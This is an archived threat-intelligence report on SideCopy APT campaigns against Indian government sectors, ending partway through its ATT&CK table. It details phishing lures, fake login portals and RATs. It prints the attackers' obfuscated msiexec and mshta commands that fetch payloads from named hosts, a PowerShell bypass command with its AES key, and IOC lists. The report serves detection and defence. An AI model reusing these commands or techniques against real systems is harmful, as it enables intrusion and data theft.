{ "id": "caeca97b-6ed7-46fa-b8a7-275542ff6452", "created_at": "2026-04-06T00:10:49.699777Z", "updated_at": "2026-04-10T03:37:41.112926Z", "deleted_at": null, "sha1_hash": "4bf5f63f9ac5ee363cccdecd9541e313fe8d962c", "title": "Goodbye HTA, Hello MSI: New TTPs and Clusters of an APT driven by Multi-Platform Attacks", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2235618, "plain_text": "Goodbye HTA, Hello MSI: New TTPs and Clusters of an APT driven by\r\nMulti-Platform Attacks\r\nBy Sathwik Ram Prakki\r\nPublished: 2025-04-08 · Archived: 2026-04-05 17:34:11 UTC\r\nSeqrite Labs APT team has uncovered new tactics of Pakistan-linked SideCopy APT deployed since the last week of\r\nDecember 2024. The group has expanded its scope of targeting beyond Indian government, defence, maritime sectors, and\r\nuniversity students to now include entities under railway, oil \u0026 gas, and external affairs ministries. One notable shift in\r\nrecent campaigns is the transition from using HTML Application (HTA) files to adopting Microsoft Installer (MSI) packages\r\nas a primary staging mechanism.\r\nThreat actors are continuously evolving their tactics to evade detection, and this shift is driven by their persistent use of DLL\r\nside-loading and multi-platform intrusions. This evolution also incorporates techniques such as reflective loading and\r\nrepurposing open-source tools such as Xeno RAT and Spark RAT, following its trend with Async RAT to extend its\r\ncapabilities. Additionally, a new payload dubbed CurlBack RAT has been identified that registers the victim with the C2\r\nserver.\r\nKey Findings\r\nUsernames associated with attacker email IDs are impersonating a government personnel member with cyber\r\nsecurity background, utilizing compromised IDs.\r\nA fake domain mimicking an e-governance service, with an open directory, is used to host payloads and credential\r\nphishing login pages.\r\nThirteen sub-domains and URLs host login pages for various RTS Services for multiple City Municipal Corporations\r\n(CMCs), all in the state of Maharashtra.\r\nThe official domain of National Hydrology Project (NHP), under the Ministry of Water Resources, has been\r\ncompromised to deliver malicious payloads.\r\nNew tactics such as reflective loading and AES decryption of resource section via PowerShell to deploy a custom\r\nversion of C#-based open-source tool XenoRAT.\r\nA modified variant of Golang-based open-source tool SparkRAT, is targeting Linux platforms, has been deployed via\r\nthe same stager previously used for Poseidon and Ares RAT payloads.\r\nA new RAT dubbed CurlBack utilizing DLL side-loading technique is used. It registers the victim with C2 server via\r\nUUID and supports file transfer using curl.\r\nHoney-trap themed campaigns were observed in January 2025 and June 2024, coinciding with the arrest of a\r\ngovernment employee accused of leaking sensitive data to a Pakistani handler.\r\nA previously compromised education portal seen in Aug 2024, became active again in February 2025 with new URLs\r\ntargeting university students. These employ three different themes: “Climate Change”, “Research Work”, and\r\n“Professional” (Complete analysis can be viewed in the recording here, explaining six different clusters of SideCopy\r\nAPT).\r\nThe parent group of SideCopy, APT36, has targeted Afghanistan after a long with a theme related to Office of the\r\nPrisoners Administration (OPA) under Islamic Emirate of Afghanistan. A recent campaign targeting Linux systems\r\nwith the theme “Developing Leadership for Future Wars” involves AES/RC4 encrypted stagers to drop MeshAgent\r\nRMM tool.\r\nTargeted sectors under the Indian Ministry\r\nRailways\r\nOil \u0026 Gas\r\nExternal Affairs\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 1 of 29\n\nDefence\r\nPhishing Emails\r\nThe campaign targeting the Defence sector beings with a phishing email dated 13 January 2025, with the subject “Update\r\nschedule for NDC 65 as discussed”. The email contains a link to download a file named “NDC65-Updated-Schedule.pdf” to\r\nlure the target.\r\nFig. 1 – NDC Phishing Email (1)\r\nA second phishing email sent on 15 January 2025 with the subject “Policy update for this course.txt”, also contains a\r\nphishing link. This email originates from an official-looking email ID which is likely compromised. National Defence\r\nCollege (NDC) is a defence service training institute for strategic and practice of National Security located in Delhi,\r\noperates under the Ministry of Defence, India.\r\nFig. 2 – NDC Phishing Email (2)\r\nThe attacker’s email address “gsosystems-ndc@outlook[.]com”, was created on 10 January 2025 in UAE and was last seen\r\nactive on 28 February 2025. OSINT reveals similar looking email ID “gsosystems.ndc-mod@nic[.]in” belonging to National\r\nInformatics Centre (NIC), a department under the Ministry of Electronics and Information Technology (MeitY), India. The\r\nusername linked to the attacker’s email impersonates a government personnel member with cyber security background.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 2 of 29\n\nFig. 3 – Attacker Email\r\nDecoy Documents\r\nThe decoy is related to the National Defence College (NDC) in India and contains the Annual Training Calendar (Study \u0026\r\nActivities) for the year 2025 for the 65th Course (NDC-65). Located in New Delhi, it is the defence service training institute\r\nand highest seat of strategic learning for officers of the Defence Service (Indian Armed Forces) and the Civil Services, all\r\noperating under the Ministry of Defence, India.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 3 of 29\n\nFig. 4 – NDC Calendar Decoy [Defence]\r\nAnother phishing archive file observed with name “2024-National-Holidays-RH-PER_N-1.zip”, comes in two different\r\nvariants targeting either Windows or Linux systems. Once the payload is triggered, it leads to a decoy document that\r\ncontains a list of holidays for the Open Line staff for the year 2024 as the name suggests. This is an official notice from\r\nSouthern Railway dated 19 December 2023, specifically for the Chennai Division. Southern Railway (SR) is one of the\r\neighteen zones of Indian Railways, a state-owned undertaking of the Ministry of Railways, India.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 4 of 29\n\nFig. 5 – Holiday List Decoy [Railways]\r\nThe third infection chain includes a document titled “Cybersecurity Guidelines” for the year 2024, which appears to be\r\nissued by Hindustan Petroleum Corporation Limited (HPCL). Headquarted in Mumbai, HPCL is a public sector undertaking\r\nin petroleum and natural gas industry and is a subsidiary of the Oil and Natural Gas Corporation (ONGC), a state-owned\r\nundertaking of the Ministry of Petroleum and Natural Gas, India.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 5 of 29\n\nFig. 6 – Cybersecurity Guidelines Decoy [Oil \u0026 Gas]\r\nAnother document linked to the same infection is the “Pharmaceutical Product Catalogue” for 2025, issued by MAPRA. It is\r\nspecifically intended for employees of the Ministry of External Affairs (MEA), in India. Mapra Laboratories Pvt. Ltd. is a\r\npharmaceutical company with headquarters in Mumbai.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 6 of 29\n\nFig. 7 – Catalogue Decoy [External Affairs]\r\nOpenDir and CredPhish\r\nA fake domain impersonating the e-Governance portal services has been utilized to carry out the campaign targeting railway\r\nentities. This domain was created on 16 June 2023 and features an open directory hosting multiple files, identified during the\r\ninvestigation.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 7 of 29\n\nFig. 8 – Open directory\r\nA total of 13 sub-domains have been identified, which function as login portals for various systems such as:\r\nWebmail\r\nSafety Tank Management System\r\nPayroll System\r\nSet Authority\r\nThese are likely used for credential phishing, actively impersonating multiple legitimate government portals since last year.\r\nThese login pages are typically associated with RTS Services (Right to Public Services Act) and cater to various City\r\nMunicipal Corporations (CMC). All these fake portals belong to cities located within the state of Maharashtra:\r\nChandrapur\r\nGadchiroli\r\nAkola\r\nSatara\r\nVasai Virar\r\nBallarpur\r\nMira Bhaindar\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 8 of 29\n\nFig. 9 – Login portals hosted on fake domain\r\nThe following table lists the identified sub-domains and the dates they were first observed:\r\nSub-domains First Seen\r\ngadchiroli.egovservice[.]in 2024-12-16\r\npen.egovservice[.]in 2024-11-27\r\ncpcontacts.egovservice[.]in\r\ncpanel.egovservice[.]in\r\nwebdisk.egovservice[.]in\r\ncpcalendars.egovservice[.]in\r\nwebmail.egovservice[.]in\r\n2024-01-03\r\ndss.egovservice[.]in\r\ncmc.egovservice[.]in\r\n2023-11-03\r\nmail.egovservice[.]in 2023-10-13\r\npakola.egovservice[.]in\r\npakora.egovservice[.]in\r\n2023-07-23\r\negovservice[.]in 2023-06-16\r\nAll these domains have the following DNS history primarily registered under AS 140641 (YOTTA NETWORK SERVICES\r\nPRIVATE LIMITED). This indicates a possible coordinated infrastructure set up to impersonate legitimate services and\r\ncollect credentials from unsuspecting users.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 9 of 29\n\nFig. 10 – DNS history\r\nFurther investigation into the open directory revealed additional URLs associated with the fake domain. These URLs likely\r\nserve similar phishing purposes and host further decoy content.\r\nhxxps://egovservice.in/vvcmcrts/\r\nhxxps://egovservice.in/vvcmc_safety_tank/\r\nhxxps://egovservice.in/testformonline/test_form\r\nhxxps://egovservice.in/payroll_vvcmc/\r\nhxxps://egovservice.in/pakora/egovservice.in/\r\nhxxps://egovservice.in/dssrts/\r\nhxxps://egovservice.in/cmc/\r\nhxxps://egovservice.in/vvcmcrtsballarpur72/\r\nhxxps://egovservice.in/dss/\r\nhxxps://egovservice.in/130521/set_authority/\r\nhxxps://egovservice.in/130521/13/\r\nCluster-A\r\nThe first cluster of SideCopy’s operations shows a sophisticated approach by simultaneously targeting both Windows and\r\nLinux environments. New remote access trojans (RATs) have been added to their arsenal, enhancing their capability to\r\ncompromise diverse systems effectively.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 10 of 29\n\nFig. 11 – Cluster A\r\nWindows\r\nA spear-phishing email link downloads an archive file, that contains double extension (.pdf.lnk) shortcut. They are hosted on\r\ndomains that look to be legitimate:\r\nhxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/\r\nhxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/\r\nThe shortcut triggers cmd.exe with arguments that utilize escape characters (^) to evade detection and reduce readability. A\r\nnew machine ID “dv-kevin” is seen with these files as we see “desktop-” prefix in its place usually.\r\nFig. 12 – Shortcuts with double extension\r\nUtility msiexec.exe is used for installing the MSI packages that are hosted remotely. It uses quiet mode flag with the\r\ninstallation switch.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 11 of 29\n\nC:\\Windows\\System32\\cmd.exe /c m^s^i^e^x^e^c.exe /q /i\r\nh^t^t^p^s^:^/^/^e^g^o^v^s^e^r^v^i^c^e^.^i^n^/^d^s^s^r^t^s^/^h^e^l^p^e^r^s^/^f^o^n^t^s^/^2^0^2^4^-^N^a^t^i^o^nal-\r\n^H^o^l^i^d^a^y^s^-^R^H^-^P^E^R^_^N-^1^/^i^n^s^t^/\r\nC:\\Windows\\System32\\cmd.exe /c m^s^i^e^x^e^c.exe /q /i\r\nh^t^t^p^s^:^/^/^n^h^p^.^m^o^w^r^.^g^o^v^.^i^n^/^N^H^P^M^I^S^/^T^r^a^i^n^i^n^g^M^a^t^e^r^i^a^l^/^a^s^p^x^/^S^e^c^u^r^i^\r\n^G^u^i^d^e^l^i^n^e^s^/^w^o^n^t^/\r\nThe first domain mimics a fake e-governance site seen with the open directory, while the second one is a compromised\r\ndomain that belongs to the official National Hydrology Project, an entity under the Ministry of Water Resources. The MSI\r\ncontains a .NET executable ConsoleApp1.exe which drops multiple PE files that are base64 encoded. Firstly, the decoy\r\ndocument is dropped in Public directory and opened, whereas remaining PE files are dropped in\r\n‘C:\\ProgramData\\LavaSoft\\’. Among them are two DLLs:\r\nLegitimate DLL: Sampeose.dll\r\nMalicious DLL: DUI70.dll, identified as CurlBack RAT.\r\nFig. 13 – Dropper within MSI package\r\nCurlBack RAT\r\nA signed Windows binary girbesre.exe with original name CameraSettingsUIHost.exe is dropped beside the DLLs. Upon\r\nexecution, the EXE side-loads the malicious DLL. Persistence is achieved by dropping a HTA script (svnides.hta) that\r\ncreates a Run registry key for the EXE. Two different malicious DLL samples were found, which have the compilation\r\ntimestamps as 2024-12-24 and 2024-12-30.\r\nFig. 14 – Checking response ‘/antivmcommand’\r\nCurlBack RAT initially checks the response of a specific URL with the command ‘/antivmcommand’. If the response is\r\n“on”, it proceeds, otherwise it terminates itself thereby maintaining a check. It gathers system information, and any\r\nconnected USB devices using the registry key:\r\n“SYSTEM\\\\ControlSet001\\\\Enum\\\\USBSTOR”\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 12 of 29\n\nFig. 15 – Retrieving system info and USB devices\r\nDisplays connected and running processes are enumerated to check for explorer, msedge, chrome, notepad, taskmgr,\r\nservices, defender, and settings.\r\nFig. 16 – Enumerate displays and processes\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 13 of 29\n\nNext, it generates a UUID for client registration with the C2 server. The ID generated is dumped at “C:\\Users\\\r\n\u003cusername\u003e\\.client_id.txt” along with the username.\r\nFig. 17 – Client ID generated for C2 registration\r\nBefore registering with the ID, persistence is set up via scheduled task with the name “OneDrive” for the legitimate binary,\r\nwhich can be observed at the location: “C:\\Windows\\System32\\Tasks\\OneDrive”.\r\nFig. 18 – Scheduled Task\r\nReversed strings appended to the C2 domain and their purpose:\r\nString Functionality\r\n/retsiger/ Register client with the C2\r\n/sdnammoc/ Fetch commands from C2\r\n/taebtraeh/ Check connection with C2 regularly\r\n/stluser/ Upload results to the C2\r\nOnce registered, the connection is kept alive to retrieve any commands that are returned in the response.\r\nFig. 19 – Commands response after registration\r\nIf the response contains any value, it retrieves the current timestamp and executes one of the following C2 commands:\r\nCommand Functionality\r\ninfo Gather system information\r\ndownload Download files from the host\r\npersistence Modify persistence settings\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 14 of 29\n\nrun Execute arbitrary commands\r\nextract Extract data from the system\r\npermission Check and elevate privileges\r\nusers Enumerate user accounts\r\ncmd Execute command-line operations\r\nFig. 20 – Checking process privilege with ‘permission’ command\r\nOther basic functions include fetching user and host details, extracting archive files, and creating tasks. Strings and code\r\nshow that CURL within the malicious DLL is present to enumerate and transfer various file formats:\r\nImage files: GIF, JPEG, JPG, SVG\r\nText files: TXT, HTML, PDF, XML\r\nFig. 21 – CURL protocols supported\r\nLinux\r\nIn addition to its Windows-focused attacks, the first cluster of SideCopy also targets Linux environments. The malicious\r\narchive file shares the same name as its Windows counterpart, but with a modification date of 2024-12-20. This archive\r\ncontains a Go-based ELF binary, reflecting a consistent cross-platform strategy. Upon analysis, the function flow of the\r\nstager has code similarity to the stagers associated with Poseidon and Ares RAT. These are linked to Transparent Tribe and\r\nSideCopy APTs respectively.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 15 of 29\n\nFig. 22 – Golang Stager for Linux\r\nStager functionality:\r\n1. Uses wget command to download a decoy from egovservice domain into the target directory /.local/share and open it\r\n(National-Holidays-RH-PER_N-1.pdf).\r\n2. Download the final payload elf as /.local/share/xdg-open and execute.\r\n3. Create a crontab ‘/dev/shm/mycron’ to maintain persistence through system reboot for the payload, under the current\r\nusername.\r\nThe final payload delivered by the stager is Spark RAT, an open-source remote access trojan with cross-platform support for\r\nWindows, macOS, and Linux systems. Written in Golang and released on GitHub in 2022, the RAT is very popular with\r\nover 500 forks. Spark RAT uses WebSocket protocol and HTTP requests to communicate with the C2 server.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 16 of 29\n\nFig. 23 – Custom Spark RAT ‘thunder’ connecting to C2\r\nFeatures of Spark RAT include process management and termination, network traffic monitoring, file exploration and\r\ntransfer, file editing and deletion, code highlighting, desktop monitoring, screenshot capture, OS information retrieval, and\r\nremote terminal access. Additionally, it supports power management functions like shutdown, reboot, log-off, sleep,\r\nhibernate and lock screen functions.\r\nCluster-B\r\nThe second cluster of SideCopy’s activities targets Windows systems, although we suspect that it is targeting Linux systems\r\nbased on their infrastructure observed since 2023.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 17 of 29\n\nFig. 24 – Cluster B\r\nThe infection starts with a spear-phishing email link, that downloads an archive file named ‘NDC65-Updated-Schedule.zip’.\r\nThis contains a shortcut file in double extension format which triggers a remote HTA file hosted on another compromised\r\ndomain:\r\n“hxxps://modspaceinterior.com/wp-content/upgrade/01/ \u0026 mshta.exe”\r\nFig. 25 – Archive with malicious LNK\r\nThe machine ID associated with the LNK “desktop-ey8nc5b” has been observed in previous campaigns of SideCopy,\r\nalthough the modification date ‘2023:05:26’ suggests it may be an older one being reused. In parallel to the MSI stagers, the\r\ngroup continues to utilize HTA-based stagers which remain almost fully undetected (FUD).\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 18 of 29\n\nFig. 26 – Almost FUD stager of HTA\r\nThe HTA file contains a Base64 encoded .NET payload BroaderAspect.dll, which is decoded and loaded directly into the\r\nmemory of MSHTA. This binary opens the dropped NDC decoy document in ProgramData directory and an addtional .NET\r\nstager as a PDF in the Public directory. Persistence is set via Run registry key with the name “Edgre” and executes as:\r\ncmd /C start C:\\Users\\Public\\USOShared-1de48789-1285\\zuidrt.pdf\r\nEncrypted Payload\r\nThe dropped .NET binary named ‘Myapp.pdb’ has two resource files:\r\n“Myapp.Resources.Document.pdf”\r\n“Myapp.Properties.Resources.resources”\r\nThe first one is decoded using Caesar cipher with shift of 9 characters in backward direction. It is dropped as\r\n‘Public\\Downloads\\Document.pdf’ (122.98 KB), which is a 2004 GIAC Paper on “Advanced communication techniques of\r\nremote access trojan horses on windows operating systems”.\r\nFig. 27– Document with appended payload\r\nThough it is not a decoy, an encrypted payload is appended at the end. The malware searches for the “%%EOF” marker to\r\nseparate PDF data from EXE data. The PDF data is extracted from the start to the marker, while the EXE Data is extracted\r\nafter skipping 6 bytes beyond the marker.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 19 of 29\n\nFig. 28 – Extracting EXE after EOF marker\r\nAfter some delay, the EXE data is dropped as “Public\\Downloads\\suport.exe” (49.53 KB) which is sent as an argument\r\nalong with a key to trigger a PowerShell command.\r\nFig. 29 – Extracting resource and triggering PowerShell\r\nPowerShell Stage\r\nThe execution of PowerShell command with basic arguments “-NoProfile -ExecutionPolicy Bypass -Command” to ignore\r\npolicies and profile is seen. Two parameters are sent:\r\n-EPath 'C:\\\\Users\\\\Public\\\\Downloads\\\\suport.exe'\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 20 of 29\n\n-EKey 'wq6AHvkMcSKA++1CPE3yVwg2CpdQhEzGbdarOwOrXe0='\r\nAfter some delay, the encryption key is decoded from Base64, and the first 16 bytes are treated as the IV for AES encryption\r\n(CBC mode with PKCS7 padding). This is done to load the decrypted binary as a .NET assembly directly into memory,\r\ninvoking its entry point.\r\nFig. 30 – PowerShell decryption\r\nCustom Xeno RAT\r\nDumping the final .NET payload named ‘DevApp.exe’ leads us to familiar functions seen in Xeno RAT. It is an open source\r\nremote access trojan that was first seen at the end of 2023. Key features include HVNC, live microphone access, socks5\r\nreverse proxy, UAC bypass, keylogger, and more. The custom variant used by SideCopy has added basic string\r\nmanipulation methods with C2 and port as 79.141.161[.]58:1256.\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 21 of 29\n\nFig. 31 – Custom Xeno RAT\r\nLast year, a custom Xeno RAT variant named MoonPeak was used by a North Korean-linked APT tracked as UAT-5394.\r\nSimilarly, custom Spark RAT variants have been adopted by Chinese-speaking actors such as DragonSpark and TAG-100.\r\nInfrastructure and Attribution\r\nDomains used for malware staging by the threat group. Most of them have registrar as GoDaddy.com, LLC.\r\nStaging Domain First Seen Created ASN\r\nmodspaceinterior[.]com Jan 2025 Sept 2024 AS 46606 – GoDaddy\r\ndrjagrutichavan[.]com Jan 2025 Oct 2021 AS 394695 – GoDaddy\r\nnhp.mowr[.]gov[.]in Dec 2024 Feb 2005 AS 4758 – National Informatics Centre\r\negovservice[.]in Dec 2024 June 2023 AS 140641 – GoDaddy\r\npmshriggssssiwan[.]in Nov 2024 Mar 2024 AS 47583 – Hostinger\r\neducationportals[.]in Aug 2024 Aug 2024 AS 22612 – NameCheap\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 22 of 29\n\nC2 domains have been created just before the campaign in the last week of December 2024. With Canadian registrar\r\n“Internet Domain Service BS Corp.”, they resolve to IPs with Cloudflare ASN 13335 located in California.\r\nC2 Domain Created IP ASN\r\nupdates.widgetservicecenter[.]com 2024-Dec-25\r\n104.21.15[.]163\r\n172.67.163[.]31\r\nASN 13335 – Clouflare\r\nupdates.biossysinternal[.]com 2024-Dec-23\r\n172.67.167[.]230\r\n104.21.13[.]17\r\nASN 202015 – HZ Hosting Ltd.\r\nThe C2 for Xeno RAT 79.141.161[.]58 has a unique common name (CN=PACKERP-63KUN8U) with HZ Hosting Limited\r\nof ASN 202015. The port used for communication is 1256 but an open RDP port 56777 is also observed.\r\nFig. 32 – Diamond Model\r\nBoth C2 domains are associated with Cloudflare ASN 13335, resolved to IP range 172.67.xx.xx. Similar C2 domains on this\r\nASN have previously been leveraged by SideCopy in attacks targeting the maritime sector. Considering the past infection\r\nclusters, observed TTPs and hosted open directories, these campaigns with new TTPs are attributed to SideCopy with high\r\nconfidence.\r\nConclusion\r\nPakistan-linked SideCopy APT group has significantly evolved its tactics since late December 2024, expanding its targets to\r\ninclude critical sectors such as railways, oil \u0026 gas, and external affairs ministries. The group has shifted from using HTA\r\nfiles to MSI packages as a primary staging mechanism and continues to employ advanced techniques like DLL side-loading,\r\nreflective loading, and AES decryption via PowerShell. Additionally, they are leveraging customized open-source tools like\r\nXeno RAT and Spark RAT, along with deploying the newly identified CurlBack RAT. Compromised domains and fake sites\r\nare being utilized for credential phishing and payload hosting, highlighting the group’s ongoing efforts to enhance\r\npersistence and evade detection.\r\nSEQRITE Protection\r\nLNK.SideCopy.49245.Gen\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 23 of 29\n\nLNK.Trojan.49363.GC\r\nSideCopy.Mal.49246.GC\r\nHTA.SideCopy.49248.Gen\r\nHTA.SideCopy.49247.Gen\r\nHTA.Trojan.49362.GC\r\nTrojan.Fmq\r\nIOCs\r\nWindows\r\na5410b76d0cb36786e00d2968d3ab6e4 2024-National-Holidays-RH-PER_N-1.zip\r\nf404496abccfa93eed5dfda9d8a53dc6 2024-National-Holidays-RH-PER_N-1.pdf.lnk\r\n0e57890a3ba16b1ac0117a624f262e61 Security-Guidelines.zip\r\n57c2f8b4bbf4037439317a44c2263346 Security-Guidelines.pdf.lnk\r\n53eebedc3846b7cf5e29a90a5b96c803 wininstaller.msi\r\n97c3328427b72f05f120e9a98b6f9b09 installerr.msi\r\n0690116134586d41a23baed300fc6355 ConsoleApp1.exe\r\nef40f484e095f0f6f207139cb870a16e ConsoleApp1.exe\r\n9d189e06d3c4cefdd226e645a0b8bdb9 DUI70.dll\r\n589a65e0f3fe6777d17d0ac36ab07f6f DUI70.dll\r\n0eb9e8bec7cc70d603d2d8b6efdd6bb5 update schedule for ndc 65 as discussed.txt\r\n8ceeeec0e33026114f028cbb006cb7fc policy update for this course.txt\r\n1d65fa0457a9917809660fff782689fe NDC65-Updated-Schedule.zip\r\n7637cbfa99110fe8e1074e7ead66710e NDC65-Updated-Schedule.pdf.lnk\r\n32a44a8f7b722b078b647e82cb9e85cf NDC65-Updated-Schedule.hta\r\na2dc9654b99f656b4ab30cf5d97fe2e1 BroaderAspect.dll\r\nb45aa156aef2ad2c77b7c623a222f453 zuidrt.pdf\r\n83ce6ee6ad09a466eb96f347a8b0dc20 Document.pdf\r\ncf6681cf1f765edb6cae81eeed389f78 suport.exe\r\nc952aca2036d6646c0cffde9e6f22775 DevApp.exe (Custom Xeno RAT)\r\nLinux\r\nb5e71ff3932c5ef6319b7ca70f7ba8da 2024-National-Holidays-RH-PER_N-1.zip\r\n0a67bfda993152c93a212087677f9b60 2024-National-Holidays-RH-PER_N-1․pdf\r\ne165114280204c39e99cf0c650477bf8 clinsixfer.elf (Custom Spark RAT)\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 24 of 29\n\nC2\r\n79.141.161[.]58:1256 Xeno RAT\r\nupdates.widgetservicecenter[.]com\r\nupdates.biossysinternal[.]com\r\nCurlBack RAT\r\nURLs\r\nhxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/\r\nhxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/inst/\r\nhxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/clinsixfer.elf\r\nhxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/2024-National-Holidays-RH-PER_N-1.pdf\r\nhxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/\r\nhxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/wont/\r\nhxxps://updates.widgetservicecenter.com/antivmcommand\r\nhxxps://modspaceinterior.com/wp-content/upgrade/02/NDC65-Updated-Schedule.zip\r\nhxxps://modspaceinterior.com/wp-content/upgrade/01/\r\nhxxps://modspaceinterior.com/wp-content/upgrade/01/NDC65-Updated-Schedule.hta\r\nhxxps://egovservice.in/vvcmcrts/\r\nhxxps://egovservice.in/vvcmc_safety_tank/\r\nhxxps://egovservice.in/testformonline/test_form\r\nhxxps://egovservice.in/payroll_vvcmc/\r\nhxxps://egovservice.in/pakora/egovservice.in/\r\nhxxps://egovservice.in/dssrts/\r\nhxxps://egovservice.in/cmc/\r\nhxxps://egovservice.in/vvcmcrtsballarpur72/\r\nhxxps://egovservice.in/dss/\r\nhxxps://egovservice.in/130521/set_authority/\r\nhxxps://egovservice.in/130521/13/\r\nStaging domains\r\nmodspaceinterior[.]com\r\ndrjagrutichavan[.]com\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 25 of 29\n\nnhp.mowr[.]gov[.]in\r\npmshriggssssiwan[.]in\r\neducationportals[.]in\r\negovservice[.]in\r\ngadchiroli.egovservice[.]in\r\npen.egovservice[.]in\r\ncpcontacts.egovservice[.]in\r\ncpanel.egovservice[.]in\r\nwebdisk.egovservice[.]in\r\ncpcalendars.egovservice[.]in\r\nwebmail.egovservice[.]in\r\nwww.dss.egovservice[.]in\r\nwww.cmc.egovservice[.]in\r\ncmc.egovservice[.]in\r\ndss.egovservice[.]in\r\nmail.egovservice[.]in\r\nwww.egovservice[.]in\r\nwww.pakola.egovservice[.]in\r\npakola.egovservice[.]in\r\nwww.pakora.egovservice[.]in\r\npakora.egovservice[.]in\r\nHost and PDB\r\nC:\\ProgramData\\LavaSoft\\Sampeose.dll\r\nC:\\ProgramData\\LavaSoft\\DUI70.dll\r\nC:\\ProgramData\\LavaSoft\\girbesre.exe\r\nC:\\ProgramData\\LavaSoft\\svnides.hta\r\nC:\\Users\\Public\\USOShared-1de48789-1285\\zuidrt.pdf\r\nC:\\Users\\Public\\Downloads\\Document.pdf\r\nC:\\Users\\Public\\Downloads\\suport.exe\r\nE:\\finalRnd\\Myapp\\obj\\Debug\\Myapp.pdb\r\nhttps://www.seqrite.com/blog/goodbye-hta-hello-msi-new-ttps-and-clusters-of-an-apt-driven-by-multi-platform-attacks/\r\nPage 26 of 29\n\nDecoys\r\n320bc4426f4f152d009b6379b5257c78 2024-National-Holidays-RH-PER_N-1.pdf\r\n9de50f9357187b623b06fc051e3cac4f Security-Guidelines.pdf\r\nc9c98cf1624ec4717916414922f196be NDC65-Updated-Schedule.pdf\r\n83ce6ee6ad09a466eb96f347a8b0dc20 Document.pdf\r\nMITRE ATT\u0026CK\r\nTTP Name\r\nReconnaissance  \r\nT1589.002 Gather Victim Identity Information: Email Addresses\r\nResource Development  \r\nT1583.001\r\nT1584.001\r\nT1587.001\r\nT1588.001\r\nT1588.002\r\nT1608.001\r\nT1608.005\r\nT1585.002\r\nT1586.002\r\nAcquire Infrastructure: Domains\r\nCompromise Infrastructure: Domains\r\nDevelop Capabilities: Malware\r\nObtain Capabilities: Malware\r\nObtain Capabilities: Tool\r\nStage Capabilities: Upload Malware\r\nStage Capabilities: Link Target\r\nEstablish Accounts: Email Accounts\r\nCompromise Accounts: Email Accounts\r\nInitial Access\r\nT1566.002 Phishing: Spear phishing 